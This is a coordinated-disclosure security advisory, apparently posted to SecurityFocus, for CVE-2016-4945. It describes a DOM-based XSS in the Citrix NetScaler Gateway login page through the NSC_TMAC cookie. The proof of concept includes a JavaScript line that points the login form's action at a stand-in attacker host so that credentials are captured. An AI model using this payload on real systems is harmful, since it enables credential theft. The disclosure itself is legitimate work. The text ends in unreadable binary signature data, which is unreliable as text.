[CVE-2016-4945] Login Form Hijacking Vulnerability in Citrix NetScaler Gateway May 27 2016 08:25PM
Daniel Schliebner (DSchliebner persicon com)
PERSICON Security Advisory
Title: Login Form Hijacking vulnerability
Product: Citrix Netscaler
Vulnerable Version: 11.0 Build 64.35
Fixed Version: 11.0 Build 66.11
CVE-ID: CVE-2016-4945
Impact: medium
found: 2015-04-07
by: Dr. Daniel Schliebner <dschliebner (at) persicon (dot) com [email concealed]>

Vendor Description:
"Citrix (NASDAQ:CTXS) aims to power a world where people, organizations
and things are securely connected and accessible to make the
extraordinary possible. Its technology makes the world's apps and
data secure and easy to access, empowering people to work anywhere
and at any time. Citrix provides a complete and integrated portfolio
of Workspace-as-a-Service, application delivery, virtualization, mobility,
network delivery and file sharing solutions that enables IT to ensure
critical systems are securely available to users via the cloud or
on-premise and across any device or platform. With annual revenue
in 2015 of $3.28 billion, Citrix solutions are in use by more than
400,000 organizations and over 100 million users globally."

Vulnerability Description:
The login page of the Citrix Netscaler Gateway web frontend is
vulnerable to a DOM-based Cross-Site-Scripting (XSS) vulnerability due
to improper sanitization of the content of the "NSC_TMAC" cookie.

The vulnerability is located in the file


in which the the cookie's content is - if set - written to the DOM
via JavaScript. This is done in the following excerpt:

var cookie_action = ns_getcookie("NSC_TMAC");
var action_url= '/cgi/login';
if (cookie_action) {
action_url = cookie_action;

This vulnerability can be exploited by an unauthorized remote attacker
by forging the destination address of the login formular in order to
receive login credentials of a victim. This can be achieved by for
example using another XSS vulnerability on the companies web page.

Proof of concept:
Assume this vulnerability resides on https://my-foobar-company.com/vpn/.
Assume further, an attacker is able to set a cookie on a victims client
via some other attack vector like, e.g., another XSS vulnerability.

The attacker needs to first (e.g. by XSS) execute the following code
on the client:

document.cookie='NSC_TMAC=https://attack.ers/receive/;' +
' domain=.my-foobar-company.com';

As a consequence, the Netscaler Gateway login formular has the url
"https://attack.ers/receive/" as the value in its "action" attribute
and hence a victim will sent its credentials to the attackers
host when submitting the formular.

Vulnerable / tested versions:
Citrix Netscaler 11.0 Build 65.31
Citrix Netscaler 11.0 Build 64.34

Vendor contact timeline:
2016-04-11: Contacting vendor through secure (at) citrix (dot) com [email concealed]
2015-04-11: Vendor response - issue has now the case ID CASE-6597
and will be forwarded for feedback
2016-04-12: Vendor response - issue will be reviewed
2016-04-25: Vendor response - issue will be fixed
2016-05-24: Vendor response - issue is fixed in the upcoming
release on 26th May
2016-05-26: Vendor response - issue is fixed in the upcoming
release at 5pm PDT on 26th May
2016-05-27: Status update - fix released by vendor
2016-05-27: Coordinated release of the security advisory

Remove the use of the cookie content or sanitize its content properly
before writing it to the DOM.

[1] http://support.citrix.com/article/CTX213313

0? *?H?÷
 `?He0? *?H?÷
 ? L0?_0?G  !XS¢0
 0L1 0U GlobalSign Root CA - R310U

290318100000Z0L1 0U GlobalSign Root CA - R310U

?Ì%vyx"õÀ?¶?Ê(?ývÅ­?rüFCDz?_$Ë.Ká`?FáR« GplÝdÑëõ,£?= +®?׶?y»;?w?áIÒjb/^ú?hß?'?8?×>ÉË&Y
sÞ°Èé&?Æï[?Ò`ÊI¦(öi;öËÈ(?å?aW7¬tÜtà:îr/.?ûл¿õ=á3è?+®S¦:s?ÝA :À´§¡é²O.2`éW˹?hhå8&`u²?wÿ?ï® Iü­@HÑ1a^¸?ï­w·d?z¿_Áï?bû
 ?K@ÛÀPªþÈ ï÷?TEI»? A¬³??(3Êkæt¹º-®¤
,ÿ<«U?~6ëÃWI¾á.-|`?ÃAQ#Î÷2k?¨?ç,3:;%Ò?@Î;,?xÉa/ºîÛUoß?î M½(ØrÎÓbPeë???1Ù³µÊGX?_0?0?ÿ  1?Æ-§0
 0L1 0U GlobalSign Root CA - R310U

190802100000Z0]1 0 UBE10U
GlobalSign nv-sa1301U*GlobalSign PersonalSign 1 CA - SHA256 - G20?"0
?´ÎÿìÕRÎ)_??Í?? ??e~SÉ¡Æ^
6F?å_?Ü· ??ѼYÒXyÊ?ñ?ÆÈÍà¸îöt¹ð?+6¾Éb?Å<¶ÃË^¢2ß4ìÖOµXa9ô?ßãñP2°hÈ?hð?ÛE&^
?/ìöÃuxLõé(=˼?ÙÅD»Aå?)?ÝÈßøvh¥+?W?ÙÜý¥® [êqF³Þ?5Às£è0å0Uÿ0Uÿ0ÿ0Uþ)©¸ÿ?
[ÉíBÙnwØ4WA§m0GU @0>0<U 0402+&https://www.globalsign.com/repository/06U/0-0+ ) '?

 ? ·.çÂ_?Î ?
¡Üè`?o:¡f\nh~<0}û?¥»?ðÝ)Á¼÷ÞGà C¤ÖB%!P,ÏË®?ÆÐ?íg¥¢¸á$7Q¸vâ?RÙ?O>0Njï
?®/Æ@ÕÚT?4/åCò<É?üò?Óí|¤g˪?wM6¤ÎÀÔÔý!?%½??«Á¸ ?l©H?PÃÓòÂù
"f|wPa?? OçÆ?½}#0?J»?o
Ϩ[dv?GT=Ì ,Ë/©i4H&ÆÓ@å?ÐíFíÍÆ8
îÔ¡H?ÖH ôM³s?[Þ?¼G+$¨ç[?Ë÷qX¹?¨+>0?Ê0?² f´Uý°ëµÝ[E??NT0
 0]1 0 UBE10U
GlobalSign nv-sa1301U*GlobalSign PersonalSign 1 CA - SHA256 - G20
180401111724Z0L1!0U dschliebner (at) persicon (dot) com1 [email concealed]'0% *?H?÷
 dschliebner (at) persicon (dot) com0 [email concealed]?"0
?Ð?Cu>0?ËÀ Ï¢¡>?Ê?ª^t/<ðB?x?ìçÂ?Öh&¬4mjÐßEØE2w@?­?  ©>w$Èêkûf ŝ4ÿiîC¾3ö̍² n¶@?$?r¨?-¦¿á`-?ËdѬ?¦W©ç<_¸V?VÁ½>0Å?ß??áËìF¯.ªØÈ·å(û
)WzC^oBúØÀ?÷Þ]î??Zº Pê?mK<;eÐ4sÄÓ?ß?ʶner{ñOa6Ì:#%C?þ¿¦6jºJÈ@»ðÙ¥Ðf?? ½7è.Lv×¾«7¨U µõ¼bøÅÈÙùc£??0??0Uÿ 0LU E0C0A + 2(0402+&https://www.globalsign.com/repository/0#U
0dschliebner (at) persicon (dot) com0 [email concealed] U00U%0++0GU@0>0< : 8?6http://crl.glo
î?)?|"5 HjVß?\ãȤ?R9?R¹ò¸Sdã*XUÌѝønÔªgê?7?Ñ·#¹Òo5ÿ?¥pôi>ñÀ')Möé?:ëTÈ
?¦Vâ Ѿ·ï%"?j?W6Ò´?cÕËÀP¸~+:/x7P}[ÜÒ?4VÞë?Ý¥§Ë?ov¦g??omãß;?@î ¸Ý1?å?oøé8ÆùÝ ?íÁ?Hæ[°¿?"a-7fýCX[ønå3_!&tmÅèÙlT#Kä³'æ³?ÁèIoɦs¯ _pþ´ ÿPi Ưè¡`ÄÍg1?¿0?»0q0]1 0 UBE10U
GlobalSign nv-sa1301U*GlobalSign PersonalSign 1 CA - SHA256 - G2f´Uý°ëµÝ[E??NT0
 `?He ?0 *?H?÷
 1  *?H?÷
0 *?H?÷
160527202354Z0/ *?H?÷
 1" ?>¦
pêK;Qsõ\Eãº31òñ(xô?LrõcÈõ±0? +?71s0q0]1 0 UBE10U
GlobalSign nv-sa1301U*GlobalSign PersonalSign 1 CA - SHA256 - G2f´Uý°ëµÝ[E??NT0? *?H?÷
  1s q0]1 0 UBE10U
GlobalSign nv-sa1301U*GlobalSign PersonalSign 1 CA - SHA256 - G2f´Uý°ëµÝ[E??NT0« *?H?÷
 10?0  `?He*0  `?He0
0  `?He0*?H?÷
(0  `?He0  `?He0  `?He0+0
?(çêÕe?/.u^@F?áf<1×vͨÑþÐ+?{7è_H_?»h &(Ö²QeÿFj5Ò?GÁV?çS(ÒL?Ðâ ?ׯq?lµakñ. 2jñòµ® 0äLaÓÕ¡?JsBϼÝN)?ÓµË)É<ݸR_¥ÐðXÊ?~çÀ4QKãö"ÌNÍ)NAÉxRä9£·ã
NØ_&ó缐p,JÃÃYä5=?õ.Ìç¶ú#êW?_L ?Ðððn4??4¼ Å£©xǾ7ZôbïúÒæ¿Ø[?fÇ?²??{mÝÓÉ;§áA?±?0P_ª½£+Ë?ÜD±

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus